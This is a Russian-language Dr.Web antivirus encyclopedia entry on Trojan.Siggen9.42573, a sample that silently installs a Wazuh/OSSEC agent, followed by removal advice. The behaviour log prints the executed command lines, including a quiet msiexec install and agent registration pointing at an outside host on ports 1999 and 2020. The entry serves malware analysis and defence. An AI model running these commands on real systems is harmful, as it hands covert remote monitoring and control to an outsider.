Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.
Trojan.Siggen9.42573
Добавлен в вирусную базу Dr.Web:
2020-04-25
Описание добавлено:
2020-05-01
Техническая информация
Для обеспечения автозапуска и распространения
Создает следующие сервисы
[<HKLM>\System\CurrentControlSet\Services\OssecSvc] 'Start' = '00000002'
[<HKLM>\System\CurrentControlSet\Services\OssecSvc] 'ImagePath' = '"%ProgramFiles(x86)%\ossec-agent\ossec-agent.exe"'
Вредоносные функции
Запускает на исполнение
'%WINDIR%\syswow64\net.exe' stop OssecSvc
Изменения в файловой системе
Создает следующие файлы
%TEMP%\ixp000.tmp\wazuh_agent.cmd
%ProgramFiles(x86)%\ossec-agent\tmp\tmp_15878430502764
%ProgramFiles(x86)%\ossec-agent\wodles\syscollector
%ProgramFiles(x86)%\ossec-agent\rids\052
%ProgramFiles(x86)%\ossec-agent\shared\merged.mg
%ProgramFiles(x86)%\ossec-agent\queue\fim\db\fim.db
%ProgramFiles(x86)%\ossec-agent\queue\fim\db\fim.db-journal
%ProgramFiles(x86)%\ossec-agent\shared\ar.conf
%ProgramFiles(x86)%\ossec-agent\ossec-agent.state
%ProgramFiles(x86)%\ossec-agent\.agent_info
%ProgramFiles(x86)%\ossec-agent\client.keys
%ProgramFiles(x86)%\ossec-agent\ossec.log
%PROGRAMDATA%\microsoft\windows\start menu\programs\ossec\documentation.lnk
%PROGRAMDATA%\microsoft\windows\start menu\programs\ossec\manage agent.lnk
%PROGRAMDATA%\microsoft\windows\start menu\programs\ossec\uninstall.lnk
%ProgramFiles(x86)%\ossec-agent\rids\sender_counter
%ProgramFiles(x86)%\ossec-agent\shared\cis_sles11_linux_rcl.txt
%ProgramFiles(x86)%\ossec-agent\active-response\active-responses.log
%ProgramFiles(x86)%\ossec-agent\shared\cis_debian_linux_rcl.txt
%ProgramFiles(x86)%\ossec-agent\shared\system_audit_ssh.txt
%ProgramFiles(x86)%\ossec-agent\shared\system_audit_rcl.txt
%ProgramFiles(x86)%\ossec-agent\shared\cis_win2012r2_memberl2_rcl.txt
%ProgramFiles(x86)%\ossec-agent\shared\cis_win2012r2_memberl1_rcl.txt
%ProgramFiles(x86)%\ossec-agent\shared\cis_win2012r2_domainl2_rcl.txt
%ProgramFiles(x86)%\ossec-agent\shared\cis_win2012r2_domainl1_rcl.txt
%PROGRAMDATA%\microsoft\windows\start menu\programs\ossec\edit conf.lnk
%ProgramFiles(x86)%\ossec-agent\shared\cis_sles12_linux_rcl.txt
%ProgramFiles(x86)%\ossec-agent\shared\cis_rhel_linux_rcl.txt
%ProgramFiles(x86)%\ossec-agent\shared\cis_rhel7_linux_rcl.txt
%ProgramFiles(x86)%\ossec-agent\shared\cis_rhel6_linux_rcl.txt
%ProgramFiles(x86)%\ossec-agent\shared\cis_rhel5_linux_rcl.txt
%ProgramFiles(x86)%\ossec-agent\shared\cis_mysql5-6_enterprise_rcl.txt
%ProgramFiles(x86)%\ossec-agent\shared\cis_mysql5-6_community_rcl.txt
%ProgramFiles(x86)%\ossec-agent\shared\agent.conf
%ProgramFiles(x86)%\ossec-agent\shared\cis_apache2224_rcl.txt
%WINDIR%\installer\{4d3a2b6d-877b-4e67-bb91-b40169f9af62}\icon.ico
%ProgramFiles(x86)%\ossec-agent\ossec.conf
%ProgramFiles(x86)%\ossec-agent\manage_agents.exe
%ProgramFiles(x86)%\ossec-agent\local_internal_options.conf
%ProgramFiles(x86)%\ossec-agent\license.txt
%ProgramFiles(x86)%\ossec-agent\libwinpthread-1.dll
%ProgramFiles(x86)%\ossec-agent\libwazuhext.dll
%ProgramFiles(x86)%\ossec-agent\internal_options.conf
%ProgramFiles(x86)%\ossec-agent\active-response\bin\netsh.cmd
%ProgramFiles(x86)%\ossec-agent\help.txt
%ProgramFiles(x86)%\ossec-agent\agent-auth.exe
%TEMP%\msi4a88.log
%ProgramFiles(x86)%\ossec-agent\sslagent.key
%ProgramFiles(x86)%\ossec-agent\sslagent.cert
nul
%TEMP%\ixp000.tmp\wazuh-agent-3.12.2-1.msi
%ProgramFiles(x86)%\ossec-agent\agent-auth.exe.manifest
%ProgramFiles(x86)%\ossec-agent\ruleset\sca\sca_win_audit.yml
%ProgramFiles(x86)%\ossec-agent\win32ui.exe.manifest
%ProgramFiles(x86)%\ossec-agent\ossec-agent.exe
%ProgramFiles(x86)%\ossec-agent\win32ui.exe
%ProgramFiles(x86)%\ossec-agent\shared\win_malware_rcl.txt
%ProgramFiles(x86)%\ossec-agent\shared\win_audit_rcl.txt
%ProgramFiles(x86)%\ossec-agent\shared\win_applications_rcl.txt
%ProgramFiles(x86)%\ossec-agent\vista_sec.txt
%ProgramFiles(x86)%\ossec-agent\version
%ProgramFiles(x86)%\ossec-agent\wpk_root.pem
%ProgramFiles(x86)%\ossec-agent\syscollector_win_ext.dll
%ProgramFiles(x86)%\ossec-agent\active-response\bin\route-null-2012.cmd
%ProgramFiles(x86)%\ossec-agent\active-response\bin\route-null.cmd
%ProgramFiles(x86)%\ossec-agent\shared\rootkit_trojans.txt
%ProgramFiles(x86)%\ossec-agent\shared\rootkit_files.txt
%ProgramFiles(x86)%\ossec-agent\revision
%ProgramFiles(x86)%\ossec-agent\active-response\bin\restart-ossec.cmd
%ProgramFiles(x86)%\ossec-agent\active-response\bin\netsh-win-2016.cmd
%ProgramFiles(x86)%\ossec-agent\tmp\tmp_15878430751652
Удаляет следующие файлы
%ProgramFiles(x86)%\ossec-agent\queue\fim\db\fim.db-journal
%ProgramFiles(x86)%\ossec-agent\shared\rootkit_files.txt
%ProgramFiles(x86)%\ossec-agent\shared\rootkit_trojans.txt
%ProgramFiles(x86)%\ossec-agent\shared\win_applications_rcl.txt
%ProgramFiles(x86)%\ossec-agent\shared\win_audit_rcl.txt
%ProgramFiles(x86)%\ossec-agent\shared\win_malware_rcl.txt
%ProgramFiles(x86)%\ossec-agent\queue\fim\db\fim.db
Подменяет следующие файлы
%ProgramFiles(x86)%\ossec-agent\queue\fim\db\fim.db-journal
%ProgramFiles(x86)%\ossec-agent\shared\rootkit_files.txt
%ProgramFiles(x86)%\ossec-agent\shared\rootkit_trojans.txt
%ProgramFiles(x86)%\ossec-agent\shared\win_applications_rcl.txt
%ProgramFiles(x86)%\ossec-agent\shared\win_audit_rcl.txt
%ProgramFiles(x86)%\ossec-agent\shared\win_malware_rcl.txt
%ProgramFiles(x86)%\ossec-agent\queue\fim\db\fim.db
Сетевая активность
TCP
UDP
DNS ASK ce####.rael.guru
'ce####.rael.guru':1999
Другое
Создает и запускает на исполнение
'%ProgramFiles(x86)%\ossec-agent\agent-auth.exe' -m cecile.rael.guru -p 2020 -k "%ProgramFiles(x86)%\ossec-agent\sslagent.key" -x "%ProgramFiles(x86)%\ossec-agent\sslagent.cert"
'%ProgramFiles(x86)%\ossec-agent\ossec-agent.exe'
'<SYSTEM32>\cmd.exe' /c wazuh_agent.cmd' (со скрытым окном)
Запускает на исполнение
'<SYSTEM32>\cmd.exe' /c wazuh_agent.cmd
'%WINDIR%\syswow64\net1.exe' stop OssecSvc
'%WINDIR%\syswow64\cmd.exe' /c DATE/T
'%WINDIR%\syswow64\cmd.exe' /c ""active-response/bin/restart-ossec.cmd" add "-" "null" "(from_the_server) (no_rule_id)""
'<SYSTEM32>\timeout.exe' /t 555
'<SYSTEM32>\net1.exe' START "OssecSvc"
'<SYSTEM32>\net.exe' START "OssecSvc"
'%WINDIR%\syswow64\net.exe' start OssecSvc
'<SYSTEM32>\msiexec.exe' /i "%TEMP%\IXP000.TMP\wazuh-agent-3.12.2-1.msi" /q WAZUH_MANAGER=cecile.rael.guru WAZUH_REGISTRATION_SERVER=cecile.rael.guru WAZUH_MANAGER_PORT=1999 WAZUH_REGISTRATION_PORT=2020 WAZUH_REGISTRA...
'<SYSTEM32>\cmd.exe' /S /D /c" set /p=Installing Key..."
'<SYSTEM32>\cmd.exe' /S /D /c" set /p=Installing Cert..."
'<SYSTEM32>\net1.exe' session
'<SYSTEM32>\net.exe' session
'<SYSTEM32>\cmd.exe' /S /D /c" set /p=Checking if script is running as admin..."
'<SYSTEM32>\cmd.exe' /S /D /c" echo"
'<SYSTEM32>\cmd.exe' /S /D /c" set /p=Installing..."
'%WINDIR%\syswow64\net1.exe' start OssecSvc
Рекомендации по лечению
Windows
macOS
Linux
Android
В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store .
Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light . Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
выключите устройство и включите его в обычном режиме.
Подробнее о Dr.Web для Android
Демо бесплатно на 14 дней
Выдаётся при установке
Поздравляем!
Обменяйте их на скидку до 50% на покупку Dr.Web.
Получить скидку
Скачайте Dr.Web для Android
Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через AppGallery/Google Pay
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее
OK